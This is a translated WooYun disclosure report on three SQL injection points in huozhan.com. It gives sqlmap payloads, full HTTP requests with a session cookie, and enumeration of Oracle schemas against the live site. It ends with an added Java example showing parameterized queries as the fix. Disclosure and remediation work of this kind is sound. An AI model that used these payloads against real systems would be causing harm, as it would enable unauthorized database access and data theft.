
Vulnerability summary

Defect ID: wooyun-2015-0152906

Title: P2P security: a bundle of SQL injection vulnerabilities in 货栈网

Vendor: 货栈网 (huozhan.com)

Author: 路人甲

Submitted: 2015-11-11 00:19

Fix time: 2015-12-26 00:20

Disclosed: 2015-12-26 00:20

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-11-11: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-12-26: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Several injection points submitted as one bundle.

Detailed description:

As merchandise suppliers to the retail and supermarket sector, vendors often suffer under the supermarkets' many kinds of fees: entry fees, sponsorship fees, advertising fees, barcode fees, end-cap display fees, store anniversary fees, and so on, with settlement periods of 7 days at the shortest and 60 days at the longest.
货栈网 is an innovative e-commerce trading platform that offers suppliers a brand-new way of marketing. Through this platform, 货栈网 helps suppliers develop stores (sales channels); product prices, new products, promotions and account funds are all controlled by the supplier. 货栈网 acts as your "sales rep", paid by volume; a supplier only needs to register and guarantee genuine goods at fair prices to win the favor of hundreds of store (buyer) members in the region.
OK,
down to business ^_^
I found three injections (probably more; I did not dig deeper). Hopefully these do not duplicate someone else's submission.
Injection 1:

http://www.huozhan.com:80/HelpAction_showNewsDeatil.do?areaCode=010BJ&newsId=8065


GET parameter 'areaCode' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 154 HTTP(s) requests:
---
Parameter: areaCode (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: areaCode=010BJ' AND 6922=6922 AND 'skOh'='skOh&newsId=8065
---
[00:40:23] [INFO] testing MySQL
[00:40:23] [WARNING] the back-end DBMS is not MySQL
[00:40:24] [INFO] testing Oracle
[00:40:27] [INFO] confirming Oracle
[00:40:30] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[00:40:30] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMS
[00:40:30] [INFO] fetching database (schema) names
[00:40:30] [INFO] fetching number of databases
[00:40:30] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:40:30] [INFO] retrieved: 7
[00:40:36] [INFO] retrieved: HRZMART
[00:42:29] [INFO] retrieved: HUOZHAN
[00:44:25] [INFO] retrieved:
[00:44:46] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s)
OUTLN
[00:46:25] [INFO] retrieved: SHOP
[00:46:59] [INFO] retrieved: SYS
[00:47:20] [INFO] retrieved: SYSTEM
[00:48:07] [INFO] retrieved: WMSYS
available databases [7]:
[*] HRZMART
[*] HUOZHAN
[*] OUTLN
[*] SHOP
[*] SYS
[*] SYSTEM
[*] WMSYS


Injection 2:
post.txt

POST /SupplierItemCate_searchProductList.do?AREA_CODE=0317cz2&brand=3466&categoryId=&myNews=myNews&searchValue=&SUPPLIER_CODE=73178008 
Content-Length: 102
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.huozhan.com:80/
Cookie: JSESSIONID=E7A86CA57388B857EDDEF7EE32C79B76
Host: www.huozhan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
AREA_CODE=0317cz2&categoryCode=&currPage=1&displayType=&ITEM_CODE=&searchValue=&SUPPLIER_CODE=73178008


GET parameter 'brand' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:
---
Parameter: brand (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: AREA_CODE=0317cz2&brand=3466 AND 5394=5394&categoryId=&myNews=myNews&searchValue=&SUPPLIER_CODE=73178008
---
[00:58:06] [INFO] testing MySQL
[00:58:09] [WARNING] the back-end DBMS is not MySQL
[00:58:09] [INFO] testing Oracle
[00:58:10] [INFO] confirming Oracle
[00:58:20] [INFO] the back-end DBMS is Oracle
web application technology: Nginx
back-end DBMS: Oracle
[00:58:20] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[00:58:20] [INFO] fetching database (schema) names
[00:58:20] [INFO] fetching number of databases
[00:58:20] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:58:20] [INFO] retrieved:


Injection 3:
post.txt

POST /LogonAction_zjsave.do HTTP/1.1
Content-Length: 351
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.huozhan.com:80/
Cookie: JSESSIONID=E7A86CA57388B857EDDEF7EE32C79B76
Host: www.huozhan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
ACTIVATION_DATE=01/01/1967&AREA_CODE=010BJ&CREDENTIAL_NAME=ichtjtwy&CREDENTIAL_TYPE=3&END_DATE=01/01/1967&EXPLANATION=11/2011&IMAGE_NAME=ichtjtwy&MEMBER_CODE=492091&MEMBER_TYPE=2&PROMULGATION=1&ssp=1&tj=%e5%ae%8c%e6%88%90&tj=%e7%bb%a7%e7%bb%ad%e6%b7%bb%e5%8a%a0&upload=%e4%b8%8a%e4%bc%a0%e5%9b%be%e7%89%87


POST parameter 'MEMBER_CODE' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 105 HTTP(s) requests:
---
Parameter: MEMBER_CODE (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: ACTIVATION_DATE=01/01/1967&AREA_CODE=010BJ&CREDENTIAL_NAME=ichtjtwy&CREDENTIAL_TYPE=3&END_DATE=01/01/1967&EXPLANAT
3)||CHR(111)||CHR(97)||CHR(114)||CHR(84)||CHR(87)||CHR(82)||CHR(112)||CHR(109)||CHR(106)||CHR(101)||CHR(77)||CHR(86)||CHR(109)|
R(108)||CHR(84)||CHR(118)||CHR(109)||CHR(85)||CHR(113)||CHR(98)||CHR(107)||CHR(107)||CHR(113),NULL,NULL,NULL,NULL,NULL FROM DUA
---
[01:22:58] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[01:22:58] [INFO] the back-end DBMS is Oracle
web application technology: Nginx
back-end DBMS: Oracle
[01:22:58] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other
[01:22:58] [INFO] fetching database (schema) names
available databases [7]:
[*] HRZMART
[*] HUOZHAN
[*] OUTLN
[*] SHOP
[*] SYS
[*] SYSTEM
[*] WMSYS


Proof of vulnerability:

7 databases involved (dba):

[image: 7个数据库-dba.png]


The main schema has 469 tables:

[image: HUOZHAN-469张表.png]


Too slow, so I did not go any deeper...

Remediation:

Filtering.
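As an added example that is not the vendor's code and not part of the original report: a hypothetical JDBC data-access class for the news-detail lookup behind HelpAction_showNewsDeatil.do, showing the string-concatenation pattern that the sqlmap probes above rely on beside the parameterized form that "filtering" should amount to. The table and column names (NEWS, AREA_CODE, NEWS_ID, TITLE, CONTENT), the class name and the allowlist pattern are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.regex.Pattern;

/** Hypothetical DAO for the news-detail lookup (assumed schema, not the vendor's code). */
public class NewsDetailDao {

    // Vulnerable form: both request parameters are pasted into the SQL text.
    // areaCode lands inside a quoted literal, so a single quote in the value
    // closes the literal (the shape of the areaCode probe shown above);
    // newsId is concatenated as a bare number, so no quote is needed at all
    // (the shape of the brand probe shown above).
    static String vulnerableSql(String areaCode, String newsId) {
        return "SELECT TITLE, CONTENT FROM NEWS WHERE AREA_CODE = '" + areaCode
             + "' AND NEWS_ID = " + newsId;
    }

    // Allowlist derived from the area codes visible in the report (010BJ, 0317cz2):
    // letters and digits only, short fixed length. Assumed, adjust to the real code set.
    private static final Pattern AREA_CODE = Pattern.compile("^[0-9A-Za-z]{1,10}$");

    /** Hardened form: validate shape and type first, then bind values as parameters. */
    static String[] fetchNews(Connection conn, String areaCode, String newsId) throws SQLException {
        if (areaCode == null || !AREA_CODE.matcher(areaCode).matches()) {
            throw new IllegalArgumentException("invalid areaCode");
        }
        final long id;
        try {
            id = Long.parseLong(newsId);   // "3466 AND 5394=5394" is rejected here
        } catch (NumberFormatException e) {
            throw new IllegalArgumentException("invalid newsId");
        }
        // Placeholders fix the SQL structure; the driver ships the values separately,
        // so neither quotes nor boolean operators in the input can change the query.
        String sql = "SELECT TITLE, CONTENT FROM NEWS WHERE AREA_CODE = ? AND NEWS_ID = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, areaCode);
            ps.setLong(2, id);
            try (ResultSet rs = ps.executeQuery()) {
                if (!rs.next()) {
                    return null;
                }
                return new String[] { rs.getString("TITLE"), rs.getString("CONTENT") };
            }
        }
    }
}
```

The same two changes (reject inputs that do not match the expected shape, then bind with PreparedStatement) apply unchanged to the brand and MEMBER_CODE parameters in injections 2 and 3.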

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively declined.